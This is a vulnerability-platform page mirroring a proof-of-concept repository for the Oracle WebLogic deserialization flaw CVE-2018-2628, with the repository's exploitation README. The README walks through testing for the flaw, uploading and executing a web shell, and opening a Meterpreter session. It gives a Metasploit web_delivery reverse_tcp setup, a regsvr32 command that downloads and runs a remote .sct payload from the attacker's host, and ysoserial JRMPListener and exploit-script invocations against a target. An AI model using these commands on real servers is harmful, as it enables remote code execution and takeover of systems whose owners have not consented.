漏洞平台

POC详情： b1cc60400969bbb70048c824098d70309ddb3dbc

来源

https://github.com/0xMJ/CVE-2018-2628

关联漏洞

标题： Oracle Fusion Middleware 代码问题漏洞 (CVE-2018-2628)
描述：Oracle WebLogic Server是美国甲骨文（Oracle）公司的一款适用于云环境和传统环境的应用服务器，它提供了一个现代轻型开发平台，支持应用从开发到生产的整个生命周期管理，并简化了应用的部署和管理。WLS Core是其中的一个核心组件。 Oracle WebLogic Server中的WLS核心组件存在远程代码执行漏洞。攻击者可通过远程发送攻击数据，借助T3协议在WebLogic Server中执行反序列化操作利用该漏洞执行代码。以下版本受到影响：Oracle WebLogic Serve

描述

漏洞利用工具

介绍

## 测试有无漏洞

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102010603.png)

## 上传shell

方式一：

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102010537.png)

方式二：

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190107195417.png)



## 执行shell

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102010451.png)

##  获得meterpreter

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102143024.png)

```
msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
target => 3
msf exploit(multi/script/web_delivery) >  set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.129.128
lhost => 192.168.129.128
msf exploit(multi/script/web_delivery) > set lport 2333
lport => 2333
msf exploit(multi/script/web_delivery) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.129.128:2333 
[*] Using URL: http://0.0.0.0:8080/ZqKpshnepenp8T9
msf exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.129.128:8080/ZqKpshnepenp8T9
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.168.129.128:8080/ZqKpshnepenp8T9.sct scrobj.dll
[*] 192.168.129.143  web_delivery - Handling .sct Request
[*] 192.168.129.143  web_delivery - Delivering Payload
[*] Sending stage (179779 bytes) to 192.168.129.143
[*] Meterpreter session 1 opened (192.168.129.128:2333 -> 192.168.129.143:52210) at 2019-01-02 01:29:00 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
```

在cmd下执行

```
 regsvr32 /s /n /u /i:http://192.168.129.128:8080/ZqKpshnepenp8T9.sct scrobj.dll
```

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102143132.png)

**进入meterpreter：**

```bash
sessions -i 1
```

![](https://blog-1254419664.cos.ap-chengdu.myqcloud.com/backup/20190102143212.png)

方式二：

```
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'regsvr32 /s /n /u /i:http://192.168.129.128:8080/cPeSBp.sct scrobj.dll'


python 44553.py 192.168.129.143 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.129.128 1099 JRMPClient



java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'regsvr32 /s /n /u /i:http://192.168.129.128:8080/7Gcn5at6tOGgzG.sct scrobj.dll'


python 44553.py 192.168.129.143 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.129.128 1099 JRMPClient
```

文件快照


 [4.0K]  /data/pocs/b1cc60400969bbb70048c824098d70309ddb3dbc
├── [8.1K]  44553.py
├── [ 874]  getshell cve-2018-2628.py
├── [ 46K]  k8weblogicGUI.exe
├── [7.4K]  pocweblogic.py
├── [2.6K]  README.md
├── [ 34K]  Weblogic GetShell CVE-2018-2628.exe
└── [ 48M]  ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

0 directories, 7 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。